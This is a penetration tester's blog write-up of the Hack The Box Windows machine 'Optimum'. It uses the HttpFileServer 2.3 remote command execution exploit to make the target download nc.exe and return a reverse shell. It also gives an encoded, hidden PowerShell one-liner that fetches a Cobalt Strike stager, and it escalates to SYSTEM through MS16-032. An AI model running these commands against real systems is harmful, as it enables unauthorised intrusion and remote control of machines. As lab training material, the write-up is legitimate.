

  
    
  


  




  


  

<!DOCTYPE html>
<html lang="en-us">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.26">
    <meta name="theme" content="Tranquilpeak 0.3.1-BETA">
    <title>HTB - Optimum</title>
    <meta name="author" content="Rasta Mouse">
    <meta name="keywords" content="">

    <link rel="icon" href="https://rastamouse.me/favicon.png">
    

    
    <meta name="description" content="Optimum is a Windows machine, with an average difficulty rating of &ldquo;piece of cake&rdquo;.

">
    <meta property="og:description" content="Optimum is a Windows machine, with an average difficulty rating of &ldquo;piece of cake&rdquo;.

">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="HTB - Optimum">
    <meta property="og:url" content="/2017/10/htb---optimum/">
    <meta property="og:site_name" content="Rasta Mouse">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Rasta Mouse">
    <meta name="twitter:description" content="Optimum is a Windows machine, with an average difficulty rating of &ldquo;piece of cake&rdquo;.

">
    
      <meta name="twitter:creator" content="@_RastaMouse">
    
    

    
    

    
      <meta property="og:image" content="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=640">
    

    
      <meta property="og:image" content="https://rastamouse.me/images/htb/6aa964fb82f18b346780e8d29ece8fa3.png">
    
    
    

    

    
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.css" />
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" />
    
    
    <link rel="stylesheet" href="https://rastamouse.me/css/style-u6mk0ojoywresbx8iepslrmmhl4stuhrsxuwhkpwrkrx7mryjcaimasnk4pi.min.css" />
    
    

    
      
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-60712346-1', 'auto');
ga('send', 'pageview');
</script>

    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://rastamouse.me/">Rasta Mouse</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://rastamouse.me/#about">
    
    
    
      
        <img class="header-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=90" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://rastamouse.me/#about">
          <img class="sidebar-profile-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Rasta Mouse</h4>
        
          <h5 class="sidebar-profile-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Categories</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Archives</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://twitter.com/_RastaMouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-twitter"></i>
      
      <span class="sidebar-button-desc">Twitter</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://keybase.io/rasta_mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-lock"></i>
      
      <span class="sidebar-button-desc">Keybase</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastalabs.net" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-shield"></i>
      
      <span class="sidebar-button-desc">RastaLabs</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/rasta-mouse" target="_blank">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>

    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://rastamouse.me/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>

    </ul>
  </div>
</nav>

      

      <div id="main" data-behavior="4"
        class="
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
            <div class="post-header main-content-wrap text-left">
  
    <h1 class="post-title" itemprop="headline">
      HTB - Optimum
    </h1>
  
  <div class="postShorten-meta post-meta">
  
    <time itemprop="datePublished" datetime="2017-10-28T00:00:00Z">
      
  
  
  
  
    28 October 2017
  

    </time>
  
  
  
  
    <span>in</span>
    
      <a class="category-link" href="https://rastamouse.me/categories/blog">blog</a>
    
  


</div>

</div>
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <p>Optimum is a Windows machine, with an average difficulty rating of &ldquo;piece of cake&rdquo;.</p>

<p></p>

<h2 id="httpfileserver-rce">HttpFileServer RCE</h2>

<p>After an nmap scan we see that port 80 is open, running <code>HttpFileServer</code> version <code>2.3</code>.</p>

<pre><code class="language-text">➜  Optimum nmap -n -A 10.10.10.8 -oA nmap
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
</code></pre>


<figure >
    
        <img src="https://rastamouse.me/images/htb/optimum/httpfileserver.png" />
    
    
</figure>


<p>A quick search in EDB shows that there are a few exploits available.</p>

<pre><code class="language-text">➜  Optimum searchsploit &quot;http file server&quot; 2.3
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                             |  Path
                                                                                                                                                           | (/usr/share/exploitdb/platforms/)
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                             | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                        | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                        | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                   | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
</code></pre>

<p><code>39161</code> looks promising so copy it to the current working directory, using <code>searchsploit</code> with the <code>-m</code> option.</p>

<pre><code class="language-text">➜  Optimum searchsploit -m 39161
➜  Optimum vim 39161.py 
</code></pre>

<p>The basic premise of this exploit is that it sends a specific HTTP request to the application, which causes it to download <code>nc.exe</code> from a web server we control and then executes it to send us a shell.</p>

<p>We have to modify it to work with our IP address, which is on line 35: <code>ip_addr = &quot;192.168.44.128&quot;</code>. In my case, this needs to be <code>10.10.14.5</code>.</p>

<p>We also need to copy <code>nc.exe</code> and start a web service.</p>

<pre><code class="language-text">➜  Optimum cp /usr/share/windows-binaries/nc.exe .

➜  Optimum python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
</code></pre>

<p>Next, we setup our listener to receive the reverse shell.</p>

<pre><code class="language-text">➜  Optimum nc -lnvp 443
listening on [any] 443 ...
</code></pre>

<p>Then run the exploit.</p>

<pre><code class="language-text">➜  Optimum python 39161.py 10.10.10.8 80
</code></pre>

<p>All being well, you will see some GETs for netcat.</p>

<pre><code class="language-text">10.10.10.8 - - [28/Oct/2017 12:18:39] &quot;GET /nc.exe HTTP/1.1&quot; 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] &quot;GET /nc.exe HTTP/1.1&quot; 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] &quot;GET /nc.exe HTTP/1.1&quot; 200 -
10.10.10.8 - - [28/Oct/2017 12:18:39] &quot;GET /nc.exe HTTP/1.1&quot; 200 -
</code></pre>

<p>And receive a shell.</p>

<pre><code class="language-text">connect to [10.10.14.5] from (UNKNOWN) [10.10.10.8] 49204
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop&gt;
</code></pre>

<h3 id="user-flag">User Flag</h3>

<pre><code class="language-text">C:\Users\kostas\Desktop&gt;type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
</code></pre>

<h2 id="priv-esc">Priv Esc</h2>

<p>To make post-exploitation easier, I prefer to spawn a Cobalt Strike Beacon. The following powershell one-liner will run a stager.  <code>start /B</code> will background the job - if you don&rsquo;t do this PowerShell will hang the shell and <code>ctrl+c</code> will kill netcat, forcing you to exploit all over again.</p>

<pre><code class="language-text">C:\Users\kostas\Desktop&gt;start /B powershell.exe -nop -w hidden -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA1AC8AYQAiACkAKQA=
</code></pre>

<pre><code class="language-text">*** initial beacon from kostas@10.10.10.8 (OPTIMUM)
</code></pre>

<p><code>set pro</code> is a quick way to see if we&rsquo;re running on 32-bit or 64-bit Windows.</p>

<pre><code class="language-text">beacon&gt; shell set pro

PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
</code></pre>

<p>I&rsquo;m going to use my <a href="https://github.com/rasta-mouse/Sherlock">Sherlock</a> script to look for missing MS patches, but that currently needs to run in a 64-bit process (if you&rsquo;re on a 64-bit OS of course).</p>

<pre><code class="language-text">beacon&gt; spawn x64 smb
</code></pre>


<figure >
    
        <img src="https://rastamouse.me/images/htb/optimum/beacon-x64.png" />
    
    
</figure>


<p>Now, we can load the script into memory and run the <code>Find-AllVulns</code> function.</p>

<pre><code class="language-text">beacon&gt; powershell-import D:\Tools\Sherlock\Sherlock.ps1
beacon&gt; powershell Find-AllVulns

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
</code></pre>

<p>Sherlock comes back with two missing patches. <code>MS16-032</code> is a particular favourite of mine, so let&rsquo;s aim for that one. This exploits a race-condition which requires the host to have at least 2 CPU cores - Sherlock doesn&rsquo;t currently validate this requirement, so we must check manually.</p>

<pre><code class="language-text">beacon&gt; shell wmic cpu get NumberOfCores, NumberOfLogicalProcessors /Format:List

NumberOfCores=2
NumberOfLogicalProcessors=2
</code></pre>

<p>Looks good - let&rsquo;s run the exploit.</p>

<p>I have the exploit integrated into Cobalt Strike via Aggressor Script, which makes this easy :)</p>

<pre><code class="language-text">beacon&gt; elevate ms16-032 smb

[+] established link to child beacon: 10.10.10.8
[+] received output:
     __ __ ___ ___   ___     ___ ___ ___ 
    |  V  |  _|_  | |  _|___|   |_  |_  |
    |     |_  |_| |_| . |___| | |_  |  _|
    |_|_|_|___|_____|___|   |___|___|___|
                                        
                   [by b33f -&gt; @FuzzySec]

[!] Holy handle leak Batman, we have a SYSTEM shell!!
</code></pre>


<figure >
    
        <img src="https://rastamouse.me/images/htb/optimum/system.png" />
    
    
</figure>


<h3 id="root-flag">Root Flag</h3>

<pre><code class="language-text">beacon&gt; shell type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed
</code></pre>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/hack-the-box/">hack the box</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--disabled">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/09/automated-red-team-infrastructure-deployment-with-terraform---part-2/" data-tooltip="Automated Red Team Infrastructure Deployment with Terraform - Part 2">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2017 Rasta Mouse. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--disabled">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/09/automated-red-team-infrastructure-deployment-with-terraform---part-2/" data-tooltip="Automated Red Team Infrastructure Deployment with Terraform - Part 2">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <ul class="share-options">
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
        <i class="fa fa-google-plus"></i><span>Share on Google Plus</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
        <i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f10%2fhtb---optimum%2f">
        <i class="fa fa-twitter"></i><span>Share on Twitter</span>
      </a>
    </li>
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Rasta Mouse</h4>
    
      <div id="about-card-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Penetration Tester
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        UK
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/10/htb---optimum/">
                <h3 class="media-heading">HTB - Optimum</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Oct 10, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Optimum is a Windows machine, with an average difficulty rating of &ldquo;piece of cake&rdquo;.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/09/automated-red-team-infrastructure-deployment-with-terraform---part-2/">
                <h3 class="media-heading">Automated Red Team Infrastructure Deployment with Terraform - Part 2</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Sep 9, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="introduction">Introduction</h2>

<p>In <a href="https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/"><b>Part 1</b></a>, we looked at using <a href="https://www.terraform.io/">Terraform</a> to deploy cloud infrastructure (VMs, firewalls, DNS records etc).  In this post, we&rsquo;ll look at some examples for automating the installation of tools/software on the VM resources.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/">
                <h3 class="media-heading">Jumping Network Segregation with RDP</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Aug 8, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="introduction">Introduction</h2>

<p>This short post demonstrates how it may be possible to pivot into a segregated/protected network, via an RDP Jump Box.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/">
                <h3 class="media-heading">Automated Red Team Infrastructure Deployment with Terraform - Part 1</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Aug 8, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="introduction">Introduction</h2>

<p>Deploying resiliant Red Team infrastructure can be quite a time consuming process.  This <a href="https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki">wiki</a> maintained by <a href="https://twitter.com/424f424f">Steve Borosh</a> and <a href="https://twitter.com/bluscreenofjeff">Jeff Dimmock</a> is probably the best public resource I&rsquo;ve seen in regards to design considerations and hardening tips.</p>

<p>For someone like myself, who destroys and stands fresh infrastructure up for each engagement, building everything by hand is a long, laborious process.  Anything that can be automated is a good thing.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/07/de-ice-s1.100/">
                <h3 class="media-heading">De-ICE S1.100</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jul 7, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h1 id="scenario">Scenario</h1>

<p>The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.</p>

<p>The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/07/how-to-accidently-win-against-av/">
                <h3 class="media-heading">How to Accidently Win Against AV</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jul 7, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Computer viruses have been around since as early as the 1970&rsquo;s - the eternal battle between virus creators and antivirus solutions continues to wage over 40 years later.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/cobalt-strike---spawn-as/">
                <h3 class="media-heading">Cobalt Strike - Spawn As</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><pre><code>beacon&gt; getuid
[*] You are CYBER-LANCE\sgomez

beacon&gt; spawnas cyber-lance\tswift Passw0rd! smb
</code></pre>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/psexec-much/">
                <h3 class="media-heading">PsExec Much?</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently completed an adversary simulation and thought I would write a short post about some of my experiences.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/playing-with-cuckoo/">
                <h3 class="media-heading">Playing with Cuckoo</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>After the release and complete hubbub that <a href="https://en.wikipedia.org/wiki/WannaCry_ransomware_attack">WannaCry</a> caused, I thought it would be fun to play with <a href="https://cuckoosandbox.org/">Cuckoo Sandbox</a>.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/a-citrix-story/">
                <h3 class="media-heading">A Citrix Story</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently had the pleasure of partaking in a Citrix Virtual Desktop infrastructure assessment.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         11 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://rastamouse.me/images/cover.jpg');"></div>
  


    
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/highlight.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.js"></script>


<script src="https://rastamouse.me/js/script-wl33z0n6ocaypepiqrazthtivfrliqijej4rq8ek8gvrv1awftmgjuv8k4zc.min.js"></script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight').each(function(i, block) {
    var code = "";
    hljs.highlightAuto(block.innerText).value.split(/\r\n|\r|\n/).forEach(function(line) {
      code += "<span class=\"line\">" + line + "</span><br>";
    });
    if (code.length > 0) {
      block.innerHTML = code;  
    }
  });
  $('pre > code').each(function(i, block) {
    $(this).addClass('codeblock');
    hljs.highlightBlock(block);
  });
});
</script>

  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/rastamouse.me\/2017\/10\/htb---optimum\/';
          
            this.page.identifier = '\/2017\/10\/htb---optimum\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'rastamouse';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  





    
  </body>
</html>

